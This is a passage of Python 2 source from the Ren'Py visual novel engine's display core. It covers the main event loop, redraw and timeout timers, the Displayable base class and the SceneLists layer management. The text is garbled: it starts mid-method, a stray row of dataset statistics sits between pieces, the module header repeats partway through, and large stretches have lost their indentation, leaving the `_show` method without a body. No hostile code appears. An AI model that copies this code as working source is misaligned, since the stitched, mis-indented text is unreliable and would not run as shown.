                    self.draw_screen(root_widget, fullscreen_video, (not fullscreen_video) or video_frame_drawn)

                    if first_pass:
                        if not self.interact_time:
                            self.interact_time = max(self.frame_time, get_time() - self.frame_duration)

                        scene_lists.set_times(self.interact_time)

                        # Transition times left as None above are filled in
                        # with the interaction start time.
                        for k, v in self.transition_time.iteritems():
                            if v is None:
                                self.transition_time[k] = self.interact_time

                        renpy.display.render.adjust_render_cache_times(self.frame_time, self.interact_time)

                    frame += 1
                    renpy.config.frames += 1

                    # If profiling is enabled, report the profile time.
                    if renpy.config.profile or self.profile_once:

                        renpy.plog(0, "end frame")
                        renpy.performance.analyze()
                        renpy.performance.clear()
                        renpy.plog(0, "start frame")

                        self.profile_once = False

                    if first_pass and self.last_event and self.last_event.type in [ pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP, pygame.MOUSEMOTION ]:

                        x, y = renpy.display.draw.get_mouse_pos()
                        ev, x, y = renpy.display.emulator.emulator(self.last_event, x, y)

                        if self.ignore_touch:
                            x = -1
                            y = -1

                        if renpy.android and self.last_event.type == pygame.MOUSEBUTTONUP:
                            x = -1
                            y = -1

                        renpy.display.focus.mouse_handler(None, x, y, default=False)

                    needs_redraw = False
                    first_pass = False

                    pygame.time.set_timer(REDRAW, 0)
                    pygame.event.clear([REDRAW])
                    old_redraw_time = None

                    self.update_text_rect()

                    renpy.test.testexecution.execute()

                # Move the mouse, if necessary.
                if self.mouse_move is not None:
                    if not self.mouse_move.perform():
                        self.mouse_move = None

                # Draw the mouse, if it needs drawing.
                renpy.display.draw.update_mouse()

                # See if we want to restart the interaction entirely.
                if self.restart_interaction:
                    return True, None

                # Determine if we need a redraw. (We want to run these
                # functions, so we put them first to prevent short-circuiting.)

                if renpy.display.video.frequent():
                    needs_redraw = True
                    video_frame_drawn = True

                if renpy.display.render.check_redraws():
                    needs_redraw = True

                # How many seconds until we timeout.
                _timeout_in = 3600

                # Handle the redraw timer.
                redraw_time = renpy.display.render.redraw_time()

                # We only need to set the REDRAW timer if we can block.
                can_block = renpy.display.draw.can_block()

                if self.maximum_framerate_time > get_time():
                    can_block = False

                if (redraw_time is not None) and (not needs_redraw) and can_block:

                    if redraw_time != old_redraw_time:

                        time_left = redraw_time - get_time()
                        time_left = min(time_left, 3600)
                        _redraw_in = time_left

                        if time_left <= 0:
                            try:
                                pygame.event.post(self.redraw_event)
                            except:
                                pass
                            pygame.time.set_timer(REDRAW, 0)
                        else:
                            pygame.time.set_timer(REDRAW, max(int(time_left * 1000), 1))

                        old_redraw_time = redraw_time
                else:
                    _redraw_in = 3600
                    pygame.time.set_timer(REDRAW, 0)

                # Handle the timeout timer.
                if not self.timeout_time:
                    pygame.time.set_timer(TIMEEVENT, 0)
                else:
                    time_left = self.timeout_time - get_time()
                    time_left = min(time_left, 3600)
                    _timeout_in = time_left

                    if time_left <= 0:
                        self.timeout_time = None
                        pygame.time.set_timer(TIMEEVENT, 0)
                        self.post_time_event()

                    elif self.timeout_time != old_timeout_time:

                        # Always set to at least 1ms.
                        pygame.time.set_timer(TIMEEVENT, int(time_left * 1000 + 1))
                        old_timeout_time = self.timeout_time

                if can_block or (frame >= renpy.config.idle_frame):
                    expensive = not ( needs_redraw or (_redraw_in < .2) or (_timeout_in < .2) or renpy.display.video.playing() )
                    self.idle_frame(can_block, expensive)

                if needs_redraw or (not can_block) or self.mouse_move or renpy.display.video.playing():
                    renpy.plog(1, "pre peek")
                    ev = self.event_poll()
                    renpy.plog(1, "post peek {!r}", ev)
                else:
                    renpy.plog(1, "pre wait")
                    ev = self.event_wait()
                    renpy.plog(1, "post wait {!r}", ev)

                if ev.type == pygame.NOEVENT:

                    if can_block and (not needs_redraw) and (not self.prediction_coroutine) and (not self.mouse_move):
                        pygame.time.wait(1)

                    continue

                # Recognize and ignore AltGr on Windows.
                if ev.type == pygame.KEYDOWN:
                    if ev.key == pygame.K_LCTRL:

                        ev2 = self.event_peek()

                        if (ev2 is not None) and (ev2.type == pygame.KEYDOWN):
                            if ev2.key == pygame.K_RALT:
                                continue

                # Check to see if the OS is asking us to suspend (on Android
                # and iOS.)
                if self.check_suspend(ev):
                    continue

                # Try to merge an TIMEEVENT with other timeevents.
                if ev.type == TIMEEVENT:
                    old_timeout_time = None
                    pygame.event.clear([TIMEEVENT])

                # On Android, where we have multiple mouse buttons, we can
                # merge a mouse down and mouse up event with its successor. This
                # prevents us from getting overwhelmed with too many events on
                # a multitouch screen.
                if android and (ev.type == pygame.MOUSEBUTTONDOWN or ev.type == pygame.MOUSEBUTTONUP):
                    pygame.event.clear(ev.type)

                # Handle redraw timeouts.
                if ev.type == REDRAW:
                    pygame.event.clear([REDRAW])
                    old_redraw_time = None
                    continue

                # Handle periodic events. This includes updating the mouse timers (and through the loop,
                # the mouse itself), and the audio system periodic calls.
                if ev.type == PERIODIC:
                    events = 1 + len(pygame.event.get([PERIODIC]))
                    self.ticks += events

                    for i in renpy.config.periodic_callbacks:
                        i()

                    renpy.audio.audio.periodic()
                    renpy.display.tts.periodic()
                    continue

                # Handle quit specially for now.
                if ev.type == pygame.QUIT:
                    self.quit_event()
                    continue

                # Ignore KEY-events while text is being edited (usually with an IME).
                if ev.type == pygame.TEXTEDITING:
                    if ev.text:
                        self.text_editing = ev
                    else:
                        self.text_editing = None

                elif ev.type == pygame.TEXTINPUT:
                    self.text_editing = None

                elif self.text_editing and ev.type in [ pygame.KEYDOWN, pygame.KEYUP ]:
                    continue

                if ev.type == pygame.VIDEOEXPOSE:
                    # Needed to force the display to redraw after expose in
                    # the software renderer.
                    renpy.game.interface.full_redraw = True
                    renpy.game.interface.force_redraw = True

                    if isinstance(renpy.display.draw, renpy.display.swdraw.SWDraw):
                        renpy.display.draw.full_redraw = True

                    continue

                # Handle videoresize.
                if ev.type == pygame.VIDEORESIZE:

                    # Merge with any queued resize events, keeping the last.
                    evs = pygame.event.get([pygame.VIDEORESIZE])

                    if len(evs):
                        ev = evs[-1]

                    # We seem to get a spurious event like this when leaving
                    # fullscreen mode on windows.
                    if ev.w < 256 or ev.h < 256:
                        continue

                    size = (ev.w // self.dpi_scale, ev.h // self.dpi_scale)

                    # Refresh fullscreen status (e.g. user pressed Esc. in browser)
                    main_window = pygame.display.get_window()
                    self.fullscreen = main_window is not None and bool(main_window.get_window_flags() & (pygame.WINDOW_FULLSCREEN_DESKTOP|pygame.WINDOW_FULLSCREEN))
                    renpy.game.preferences.fullscreen = self.fullscreen

                    if pygame.display.get_surface().get_size() != ev.size:
                        self.set_mode(size)

                    if not self.fullscreen:
                        self.last_resize = size

                    continue

                # If we're ignoring touch events, and get a mouse up, stop
                # ignoring those events.
                if self.ignore_touch and \
                        ev.type == pygame.MOUSEBUTTONUP and \
                        ev.button == 1:

                    self.ignore_touch = False
                    continue

                # Merge mousemotion events.
                if ev.type == pygame.MOUSEMOTION:
                    evs = pygame.event.get([pygame.MOUSEMOTION])
                    if len(evs):
                        ev = evs[-1]

                    if renpy.windows:
                        self.mouse_focused = True

                # Handle mouse event time, and ignoring touch.
                if ev.type == pygame.MOUSEMOTION or \
                        ev.type == pygame.MOUSEBUTTONDOWN or \
                        ev.type == pygame.MOUSEBUTTONUP:

                    self.mouse_event_time = renpy.display.core.get_time()

                    if self.ignore_touch:
                        renpy.display.focus.mouse_handler(None, -1, -1, default=False)

                # Handle focus notifications.
                if ev.type == pygame.ACTIVEEVENT:

                    if ev.state & 1:
                        if not ev.gain:
                            renpy.display.focus.clear_focus()

                        self.mouse_focused = ev.gain

                    if ev.state & 2:
                        self.keyboard_focused = ev.gain

                    if ev.state & 4:
                        if ev.gain:
                            self.restored()
                        else:
                            self.iconified()

                    pygame.key.set_mods(0)

                # This returns the event location. It also updates the
                # mouse state as necessary.
                x, y = renpy.display.draw.mouse_event(ev)
                x, y = renpy.test.testmouse.get_mouse_pos(x, y)

                ev, x, y = renpy.display.emulator.emulator(ev, x, y)
                if ev is None:
                    continue

                if not self.mouse_focused or self.ignore_touch:
                    x = -1
                    y = -1

                # This can set the event to None, to ignore it.
                ev = renpy.display.controller.event(ev)
                if not ev:
                    continue

                # Handle skipping.
                renpy.display.behavior.skipping(ev)

                self.event_time = end_time = get_time()

                try:

                    if self.touch:
                        renpy.display.gesture.recognizer.event(ev, x, y) # @UndefinedVariable

                    # Handle the event normally.
                    rv = renpy.display.focus.mouse_handler(ev, x, y)

                    if rv is None:
                        rv = root_widget.event(ev, x, y, 0)

                    if rv is None:
                        rv = renpy.display.focus.key_handler(ev)

                    if rv is not None:
                        break

                    # Handle displayable inspector.
                    if renpy.config.inspector:

                        if renpy.display.behavior.map_event(ev, "inspector"):
                            l = self.surftree.main_displayables_at_point(x, y, renpy.config.transient_layers + renpy.config.context_clear_layers + renpy.config.overlay_layers)
                            renpy.game.invoke_in_new_context(renpy.config.inspector, l)

                        elif renpy.display.behavior.map_event(ev, "full_inspector"):
                            l = self.surftree.main_displayables_at_point(x, y, renpy.config.layers)
                            renpy.game.invoke_in_new_context(renpy.config.inspector, l)

                except IgnoreEvent:
                    # An ignored event can change the timeout. So we want to
                    # process an TIMEEVENT to ensure that the timeout is
                    # set correctly

                    if ev.type != TIMEEVENT:
                        self.post_time_event()

                # Check again after handling the event.
                needs_redraw |= renpy.display.render.check_redraws()

                if self.restart_interaction:
                    return True, None

            # If we were trans-paused and rv is true, suppress
            # transitions up to the next interaction.
            if trans_pause and rv:
                self.suppress_transition = True

            # But wait, there's more! The finally block runs some cleanup
            # after this.
            return False, rv

        except EndInteraction as e:
            return False, e.value

        finally:

            renpy.game.context().say_attributes = None

            # Clean out the overlay layers.
            for i in renpy.config.overlay_layers:
                scene_lists.clear(i)

            # Stop ongoing preloading.
            renpy.display.im.cache.end_tick()

            # We no longer disable periodic between interactions.
            # pygame.time.set_timer(PERIODIC, 0)

            pygame.time.set_timer(TIMEEVENT, 0)
            pygame.time.set_timer(REDRAW, 0)

            self.consider_gc()

            renpy.game.context().runtime += end_time - start_time

            # Restart the old interaction, which also causes a
            # redraw if needed.
            self.restart_interaction = True

            renpy.plog(1, "end interact_core")

            # print("It took", frames, "frames.")
def timeout(self, offset):
if offset < 0:
return
if self.timeout_time:
self.timeout_time = min(self.event_time + offset, self.timeout_time)
else:
self.timeout_time = self.event_time + offset
    def finish_pending(self):
        """
        Called before a quit or restart to finish any pending work that might
        block other threads.
        """

        # Currently the only pending work is the background screenshot.
        self.check_background_screenshot()
| 29.801997 | 175 | 0.56845 |
from __future__ import print_function
import renpy.display
import renpy.audio
import renpy.text
import renpy.test
import pygame_sdl2 as pygame
import sys
import os
import time
import cStringIO
import threading
import copy
import gc
import inspect
import_time = time.time()
try:
import android
except:
android = None
TIMEEVENT = pygame.event.register("TIMEEVENT")
PERIODIC = pygame.event.register("PERIODIC")
REDRAW = pygame.event.register("REDRAW")
EVENTNAME = pygame.event.register("EVENTNAME")
ALL_EVENTS = set(pygame.event.get_standard_events())
ALL_EVENTS.add(PERIODIC)
ALL_EVENTS.add(EVENTNAME)
enabled_events = {
pygame.QUIT,
pygame.APP_TERMINATING,
pygame.APP_LOWMEMORY,
pygame.APP_WILLENTERBACKGROUND,
pygame.APP_DIDENTERBACKGROUND,
pygame.APP_WILLENTERFOREGROUND,
pygame.APP_DIDENTERFOREGROUND,
pygame.WINDOWEVENT,
pygame.SYSWMEVENT,
pygame.KEYDOWN,
pygame.KEYUP,
pygame.TEXTEDITING,
pygame.TEXTINPUT,
pygame.MOUSEMOTION,
pygame.MOUSEBUTTONDOWN,
pygame.MOUSEBUTTONUP,
pygame.MOUSEWHEEL,
pygame.JOYAXISMOTION,
pygame.JOYHATMOTION,
pygame.JOYBALLMOTION,
pygame.JOYBUTTONDOWN,
pygame.JOYBUTTONUP,
pygame.JOYDEVICEADDED,
pygame.JOYDEVICEREMOVED,
pygame.CONTROLLERAXISMOTION,
pygame.CONTROLLERBUTTONDOWN,
pygame.CONTROLLERBUTTONUP,
pygame.CONTROLLERDEVICEADDED,
pygame.CONTROLLERDEVICEREMOVED,
pygame.RENDER_TARGETS_RESET,
TIMEEVENT,
PERIODIC,
REDRAW,
EVENTNAME,
}
PERIODIC_INTERVAL = 50
time_base = 0.0
time_mult = 1.0
def init_time():
warp = os.environ.get("RENPY_TIMEWARP", "1.0")
global time_base
global time_mult
time_base = time.time()
time_mult = float(warp)
def get_time():
t = time.time()
return time_base + (t - time_base) * time_mult
def displayable_by_tag(layer, tag):
return renpy.game.context().scene_lists.get_displayable_by_tag(layer, tag)
class IgnoreEvent(Exception):
pass
class EndInteraction(Exception):
def __init__(self, value):
self.value = value
class absolute(float):
__slots__ = [ ]
def place(width, height, sw, sh, placement):
xpos, ypos, xanchor, yanchor, xoffset, yoffset, _subpixel = placement
if xpos is None:
xpos = 0
if ypos is None:
ypos = 0
if xanchor is None:
xanchor = 0
if yanchor is None:
yanchor = 0
if xoffset is None:
xoffset = 0
if yoffset is None:
yoffset = 0
if xpos.__class__ is float:
xpos *= width
if xanchor.__class__ is float:
xanchor *= sw
x = xpos + xoffset - xanchor
if ypos.__class__ is float:
ypos *= height
if yanchor.__class__ is float:
yanchor *= sh
y = ypos + yoffset - yanchor
return x, y
class DisplayableArguments(renpy.object.Object):
name = ()
args = ()
prefix = None
lint = False
def copy(self, **kwargs):
rv = DisplayableArguments()
rv.__dict__.update(self.__dict__)
rv.__dict__.update(kwargs)
return rv
def extraneous(self):
if renpy.config.developer and renpy.config.report_extraneous_attributes:
raise Exception("Image '{}' does not accept attributes '{}'.".format(
" ".join(self.name),
" ".join(self.args),
))
default_style = renpy.style.Style("default")
class Displayable(renpy.object.Object):
# assume anything.
# If True this displayable can accept focus.
# If False, it can't, but it keeps its place in the focus order.
focusable = None
full_focus_name = None
role = ''
transform_event = None
# Can we change our look in response to transform_events?
transform_event_responder = False
# The main displayable, if this displayable is the root of a composite
# displayable. (This is used by SL to figure out where to add children
# to.) If None, it is itself.
_main = None
# A list of the children that make up this composite displayable.
_composite_parts = [ ]
# The location the displayable was created at, if known.
_location = None
# Does this displayable use the scope?
_uses_scope = False
# Arguments supplied to this displayable.
_args = DisplayableArguments()
# Set to true of the displayable is duplicatable (has a non-trivial
# duplicate method), or one of its children is.
_duplicatable = False
# Does this displayable require clipping?
_clipping = False
# Does this displayable have a tooltip?
_tooltip = None
def __ne__(self, o):
return not (self == o)
def __init__(self, focus=None, default=False, style='default', _args=None, tooltip=None, default_focus=False, **properties):
global default_style
if (style == "default") and (not properties):
self.style = default_style
else:
self.style = renpy.style.Style(style, properties) # @UndefinedVariable
self.focus_name = focus
self.default = default or default_focus
self._tooltip = tooltip
if _args is not None:
self._args = _args
def _copy(self, args=None):
rv = copy.copy(self)
if args is not None:
rv._args = args
return rv
def _duplicate(self, args):
if args and args.args:
args.extraneous()
return self
def _get_tooltip(self):
return self._tooltip
def _in_current_store(self):
return self
def _unique(self):
return
def parameterize(self, name, parameters):
a = self._args.copy(name=name, args=parameters)
return self._duplicate(a)
def _equals(self, o):
if type(self) is not type(o):
return False
if self.focus_name != o.focus_name:
return False
if self.style != o.style:
return False
if self.default != o.default:
return False
return True
def __unicode__(self):
return self.__class__.__name__
def __repr__(self):
return "<{} at {:x}>".format(unicode(self).encode("utf-8"), id(self))
def find_focusable(self, callback, focus_name):
focus_name = self.focus_name or focus_name
if self.focusable:
callback(self, focus_name)
elif self.focusable is not None:
callback(None, focus_name)
for i in self.visit():
if i is None:
continue
i.find_focusable(callback, focus_name)
def focus(self, default=False):
self.set_style_prefix(self.role + "hover_", True)
if not default:
renpy.exports.play(self.style.hover_sound)
def unfocus(self, default=False):
self.set_style_prefix(self.role + "idle_", True)
def is_focused(self):
if renpy.display.focus.grab and renpy.display.focus.grab is not self:
return
return renpy.game.context().scene_lists.focused is self
def set_style_prefix(self, prefix, root):
if prefix == self.style.prefix:
return
self.style.set_prefix(prefix)
renpy.display.render.redraw(self, 0)
def render(self, width, height, st, at):
raise Exception("Render not implemented.")
def event(self, ev, x, y, st):
return None
def get_placement(self):
return self.style.get_placement()
def visit_all(self, callback, seen=None):
if seen is None:
seen = set()
for d in self.visit():
if d is None:
continue
id_d = id(d)
if id_d in seen:
continue
seen.add(id_d)
d.visit_all(callback, seen)
callback(self)
def visit(self):
return [ ]
def per_interact(self):
return None
def predict_one(self):
return
def predict_one_action(self):
return
def place(self, dest, x, y, width, height, surf, main=True):
placement = self.get_placement()
subpixel = placement[6]
xpos, ypos = place(width, height, surf.width, surf.height, placement)
xpos += x
ypos += y
pos = (xpos, ypos)
if dest is not None:
if subpixel:
dest.subpixel_blit(surf, pos, main, main, None)
else:
dest.blit(surf, pos, main, main, None)
return pos
def set_transform_event(self, event):
if event == self.transform_event:
return
self.transform_event = event
if self.transform_event_responder:
renpy.display.render.redraw(self, 0)
def _handles_event(self, event):
return False
def _hide(self, st, at, kind):
return None
def _show(self):
def _target(self):
return self
def _change_transform_child(self, child):
return child
def _clear(self):
return
def _tts_common(self, default_alt=None):
rv = [ ]
for i in self.visit():
if i is not None:
speech = i._tts()
if speech.strip():
rv.append(speech)
rv = ": ".join(rv)
rv = rv.replace("::", ":")
rv = rv.replace(": :", ":")
alt = self.style.alt
if alt is None:
alt = default_alt
if alt is not None:
rv = renpy.substitutions.substitute(alt, scope={ "text" : rv })[0]
return rv
def _tts(self):
return self._tts_common()
def _tts_all(self):
return self._tts_common()
class SceneListEntry(renpy.object.Object):
    """
    One entry on a scene-list layer: a displayable plus the bookkeeping
    (tag, zorder, show/animation times, name) used to show, hide, and
    replace it.
    """

    def __init__(self, tag, zorder, show_time, animation_time, displayable, name):
        self.tag = tag
        self.zorder = zorder
        self.show_time = show_time
        self.animation_time = animation_time
        self.displayable = displayable
        self.name = name

    def _as_tuple(self):
        # Canonical 5-tuple view shared by __iter__ and __getitem__.
        return (self.tag, self.zorder, self.show_time, self.animation_time, self.displayable)

    def __iter__(self):
        return iter(self._as_tuple())

    def __getitem__(self, index):
        return self._as_tuple()[index]

    def __repr__(self):
        return "<SLE: %r %r %r>" % (self.tag, self.name, self.displayable)

    def copy(self):
        """Return a shallow copy of this entry."""
        return SceneListEntry(
            self.tag,
            self.zorder,
            self.show_time,
            self.animation_time,
            self.displayable,
            self.name)

    def update_time(self, time):
        """
        Return an entry whose unset (or falsy) show/animation times are
        filled in with `time`; self is returned unchanged when both are
        already set.
        """
        rv = self

        if self.show_time is None or self.animation_time is None:
            rv = self.copy()
            rv.show_time = rv.show_time or time
            rv.animation_time = rv.animation_time or time

        return rv
class SceneLists(renpy.object.Object):
    """
    The per-context scene state: for each layer, the list of
    SceneListEntry objects currently shown on it, together with the
    per-tag and per-layer at-lists, transient entries, and remembered
    layer transforms.
    """

    # Pickle-compatibility version, consumed by after_upgrade.
    __version__ = 7

    def after_setstate(self):
        # Make sure every configured layer exists after unpickling, since
        # the configuration may define layers this object predates.
        for i in renpy.config.layers + renpy.config.top_layers:
            if i not in self.layers:
                self.layers[i] = [ ]
                self.at_list[i] = { }
                self.layer_at_list[i] = (None, [ ])

    def after_upgrade(self, version):
        # Incrementally bring state pickled at an older __version__ up to
        # the current layout.
        if version < 1:
            self.at_list = { }
            self.layer_at_list = { }
            for i in renpy.config.layers + renpy.config.top_layers:
                self.at_list[i] = { }
                self.layer_at_list[i] = (None, [ ])
        if version < 3:
            self.shown_window = False
        if version < 4:
            # Old entries were plain tuples without a name; wrap them.
            for k in self.layers:
                self.layers[k] = [ SceneListEntry(*(i + (None,)) ) for i in self.layers[k] ]
            self.additional_transient = [ ]
        if version < 5:
            self.drag_group = None
        if version < 6:
            self.shown = self.image_predict_info
        if version < 7:
            self.layer_transform = { }

    def __init__(self, oldsl, shown):
        super(SceneLists, self).__init__()
        # Has a window been shown as part of these scene lists?
        self.shown_window = False
        # A map from layer name -> list(SceneListEntry)
        self.layers = { }
        # A map from layer name -> tag -> at_list associated with that tag.
        self.at_list = { }
        # A map from layer to (start time, at_list), where the at list has
        # been applied to the layer as a whole.
        self.layer_at_list = { }
        # The current shown images,
        self.shown = shown
        # A list of (layer, tag) pairs that are considered to be
        # transient.
        self.additional_transient = [ ]
        # Either None, or a DragGroup that's used as the default for
        # drag members.
        self.drag_group = None
        # A map from layer name to the transform last applied to it.
        self.layer_transform = { }
        if oldsl:
            # Copy the scene over from the old scene lists, so the new
            # context starts out showing the same thing.
            for i in renpy.config.layers + renpy.config.top_layers:
                try:
                    self.layers[i] = oldsl.layers[i][:]
                except KeyError:
                    self.layers[i] = [ ]
                if i in oldsl.at_list:
                    self.at_list[i] = oldsl.at_list[i].copy()
                    self.layer_at_list[i] = oldsl.layer_at_list[i]
                else:
                    self.at_list[i] = { }
                    self.layer_at_list[i] = (None, [ ])
            for i in renpy.config.overlay_layers:
                self.clear(i)
            self.replace_transient(prefix=None)
            self.focused = None
            self.drag_group = oldsl.drag_group
            self.layer_transform.update(oldsl.layer_transform)
        else:
            for i in renpy.config.layers + renpy.config.top_layers:
                self.layers[i] = [ ]
                self.at_list[i] = { }
                self.layer_at_list[i] = (None, [ ])
        self.music = None
        self.focused = None

    def replace_transient(self, prefix="hide"):
        """
        Clear the transient layers and remove the additional transient
        entries, hiding them with `prefix` (None removes without a hide).
        """
        for i in renpy.config.transient_layers:
            self.clear(i, True)
        for layer, tag in self.additional_transient:
            self.remove(layer, tag, prefix=prefix)
        self.additional_transient = [ ]

    def transient_is_empty(self):
        """Return True when every transient layer is empty."""
        for i in renpy.config.transient_layers:
            if self.layers[i]:
                return False
        return True

    def transform_state(self, old_thing, new_thing, execution=False):
        """
        Carry transform state from `old_thing` over to `new_thing`,
        wrapping `new_thing` in a Transform when needed; when `execution`
        is true the execution state is carried over as well.  Returns the
        (possibly wrapped) new_thing.
        """
        if old_thing is None:
            return new_thing
        # Screens are managed by the screen system; leave them alone.
        if isinstance(new_thing, renpy.display.screen.ScreenDisplayable):
            return new_thing
        if renpy.config.take_state_from_target:
            old_transform = old_thing._target()
        else:
            old_transform = old_thing
        if not isinstance(old_transform, renpy.display.motion.Transform):
            return new_thing
        if renpy.config.take_state_from_target:
            new_transform = new_thing._target()
        else:
            new_transform = new_thing
        if not isinstance(new_transform, renpy.display.motion.Transform):
            new_thing = new_transform = renpy.display.motion.Transform(child=new_thing)
        new_transform.take_state(old_transform)
        if execution:
            new_transform.take_execution_state(old_transform)
        return new_thing

    def find_index(self, layer, tag, zorder, behind):
        """
        Return (add_index, remove_index, zorder): the index at which an
        entry with `tag` should be inserted on `layer`, the index of an
        existing entry with that tag (or None), and the zorder to use
        (inherited from the replaced entry or config.tag_zorder).
        """
        add_index = None
        remove_index = None
        for i, sle in enumerate(self.layers[layer]):
            if remove_index is None:
                if (sle.tag and sle.tag == tag) or sle.displayable == tag:
                    remove_index = i
                    if zorder is None:
                        zorder = sle.zorder
        if zorder is None:
            zorder = renpy.config.tag_zorder.get(tag, 0)
        for i, sle in enumerate(self.layers[layer]):
            if add_index is None:
                if sle.zorder == zorder:
                    if sle.tag and (sle.tag == tag or sle.tag in behind):
                        add_index = i
                elif sle.zorder > zorder:
                    add_index = i
        if add_index is None:
            add_index = len(self.layers[layer])
        return add_index, remove_index, zorder

    # NOTE(review): the mutable default arguments below are never mutated
    # here (behind is only read, at_list is only stored), but confirm
    # callers don't rely on sharing.
    def add(self,
            layer,
            thing,
            key=None,
            zorder=0,
            behind=[ ],
            at_list=[ ],
            name=None,
            atl=None,
            default_transform=None,
            transient=False,
            keep_st=False):
        """
        Add `thing` to `layer`, replacing any existing entry with the
        same `key` (tag).  Transform state is carried over from the
        replaced displayable where configured, and the "show" or
        "replace" transform event is delivered.
        """
        if not isinstance(thing, Displayable):
            raise Exception("Attempting to show something that isn't a displayable:" + repr(thing))
        if layer not in self.layers:
            raise Exception("Trying to add something to non-existent layer '%s'." % layer)
        if key:
            self.remove_hide_replaced(layer, key)
            self.at_list[layer][key] = at_list
        if key and name:
            self.shown.predict_show(layer, name)
        if transient:
            self.additional_transient.append((layer, key))
        l = self.layers[layer]
        if atl:
            thing = renpy.display.motion.ATLTransform(atl, child=thing)
        add_index, remove_index, zorder = self.find_index(layer, key, zorder, behind)
        at = None
        st = None
        if remove_index is not None:
            sle = l[remove_index]
            old = sle.displayable
            at = sle.animation_time
            if keep_st:
                st = sle.show_time
            # Keep the old running transform and just swap its child, when
            # configured and no new transform information was supplied.
            if (not atl and
                not at_list and
                renpy.config.keep_running_transform and
                isinstance(old, renpy.display.motion.Transform)):
                thing = sle.displayable._change_transform_child(thing)
            else:
                thing = self.transform_state(l[remove_index].displayable, thing)
            thing.set_transform_event("replace")
            thing._show()
        else:
            # A brand-new show: start from the default transform's state.
            if not isinstance(thing, renpy.display.motion.Transform):
                thing = self.transform_state(default_transform, thing)
            thing.set_transform_event("show")
            thing._show()
        sle = SceneListEntry(key, zorder, st, at, thing, name)
        l.insert(add_index, sle)
        if remove_index is not None:
            # The insert above may have shifted the entry being replaced.
            if add_index <= remove_index:
                remove_index += 1
            self.hide_or_replace(layer, remove_index, "replaced")

    def hide_or_replace(self, layer, index, prefix):
        """
        Hide or replace the entry at `index` on `layer`.  When the
        displayable's _hide returns a replacement, it stays on the layer
        under a "prefix$tag" name; otherwise the entry is removed.
        """
        if index is None:
            return
        l = self.layers[layer]
        oldsle = l[index]
        now = get_time()
        st = oldsle.show_time or now
        at = oldsle.animation_time or now
        # Skip the hide protocol entirely for displayables that don't
        # handle the event, when configured.
        if renpy.config.fast_unhandled_event:
            if not oldsle.displayable._handles_event(prefix):
                prefix = None
        if (prefix is not None) and oldsle.tag:
            d = oldsle.displayable._hide(now - st, now - at, prefix)
            # _hide can mutate the layers, so we need to recompute
            # index.
            index = l.index(oldsle)
            if d is not None:
                sle = SceneListEntry(
                    prefix + "$" + oldsle.tag,
                    oldsle.zorder,
                    st,
                    at,
                    d,
                    None)
                l[index] = sle
                return
        l.pop(index)

    def get_all_displayables(self):
        """Return a list of every displayable on every layer."""
        rv = [ ]
        for l in self.layers.itervalues():
            for sle in l:
                rv.append(sle.displayable)
        return rv

    def remove_above(self, layer, thing):
        """
        Hide everything on `layer` above `thing` (a tag or displayable),
        or everything when `thing` is falsy.  Entries already hiding
        (tags containing "$") are left alone.
        """
        for i in reversed(xrange(len(self.layers[layer]))):
            sle = self.layers[layer][i]
            if thing:
                if sle.tag == thing or sle.displayable == thing:
                    break
            if sle.tag and "$" in sle.tag:
                continue
            self.hide_or_replace(layer, i, "hide")

    def remove(self, layer, thing, prefix="hide"):
        """
        Remove `thing` (a tag or displayable) from `layer`, hiding it
        with `prefix`.  Raises on an unknown layer; a missing thing is
        silently ignored.
        """
        if layer not in self.layers:
            raise Exception("Trying to remove something from non-existent layer '%s'." % layer)
        _add_index, remove_index, _zorder = self.find_index(layer, thing, 0, [ ])
        if remove_index is not None:
            tag = self.layers[layer][remove_index].tag
            if tag:
                self.shown.predict_hide(layer, (tag,))
                self.at_list[layer].pop(tag, None)
            self.hide_or_replace(layer, remove_index, prefix)

    def clear(self, layer, hide=False):
        """
        Empty `layer`, optionally running the hide protocol on each entry
        instead of dropping it outright, and reset the layer's at-lists.
        """
        if layer not in self.layers:
            return
        if not hide:
            self.layers[layer] = [ ]
        else:
            # Have to iterate in reverse order, since otherwise
            # the indexes might change.
            for i in reversed(xrange(len(self.layers[layer]))):
                self.hide_or_replace(layer, i, hide)
        self.at_list[layer].clear()
        self.shown.predict_scene(layer)
        self.layer_at_list[layer] = (None, [ ])

    def set_layer_at_list(self, layer, at_list, reset=True):
        """Set the at-list applied to `layer` as a whole, optionally
        forgetting the remembered layer transform."""
        self.layer_at_list[layer] = (None, list(at_list))
        if reset:
            self.layer_transform[layer] = None

    def set_times(self, time):
        """Fill in `time` for any unset show/animation times, on both
        layer at-lists and individual entries."""
        for l, (t, list) in self.layer_at_list.items(): # @ReservedAssignment
            self.layer_at_list[l] = (t or time, list)
        for l, ll in self.layers.iteritems():
            self.layers[l] = [ i.update_time(time) for i in ll ]

    def showing(self, layer, name):
        """Return True if an image with `name` is being shown on `layer`."""
        return self.shown.showing(layer, name)

    def get_showing_tags(self, layer):
        return self.shown.get_showing_tags(layer)

    def get_sorted_tags(self, layer):
        """Return the tags on `layer` in display order, skipping the
        hidden/replaced ("$") entries."""
        rv = [ ]
        for sle in self.layers[layer]:
            if not sle.tag:
                continue
            if "$" in sle.tag:
                continue
            rv.append(sle.tag)
        return rv

    def make_layer(self, layer, properties):
        """
        Build a fixed MultiBox holding the entries on `layer`, wrapped in
        the layer's at-list transforms, carrying over transform state
        when config.keep_show_layer_state is set.
        """
        rv = renpy.display.layout.MultiBox(layout='fixed', focus=layer, **properties)
        rv.append_scene_list(self.layers[layer])
        rv.layer_name = layer
        rv._duplicatable = False
        time, at_list = self.layer_at_list[layer]
        old_transform = self.layer_transform.get(layer, None)
        new_transform = None
        if at_list:
            for a in at_list:
                if isinstance(a, renpy.display.motion.Transform):
                    rv = a(child=rv)
                    # Remember the outermost transform wrapping the layer.
                    new_transform = rv
                else:
                    rv = a(rv)
            if (new_transform is not None) and (renpy.config.keep_show_layer_state):
                self.transform_state(old_transform, new_transform, execution=True)
            f = renpy.display.layout.MultiBox(layout='fixed')
            f.add(rv, time, time)
            f.layer_name = layer
            rv = f
        self.layer_transform[layer] = new_transform
        return rv

    def remove_hide_replaced(self, layer, tag):
        """Drop any pending hide$tag / replaced$tag entries for `tag`."""
        hide_tag = "hide$" + tag
        replaced_tag = "replaced$" + tag
        l = self.layers[layer]
        self.layers[layer] = [ i for i in l if i.tag != hide_tag and i.tag != replaced_tag ]

    def remove_hidden(self):
        """Drop hidden/replaced entries whose _hide reports the hide
        animation is finished (returns a falsy value)."""
        now = get_time()
        for l in self.layers:
            newl = [ ]
            for sle in self.layers[l]:
                if sle.tag:
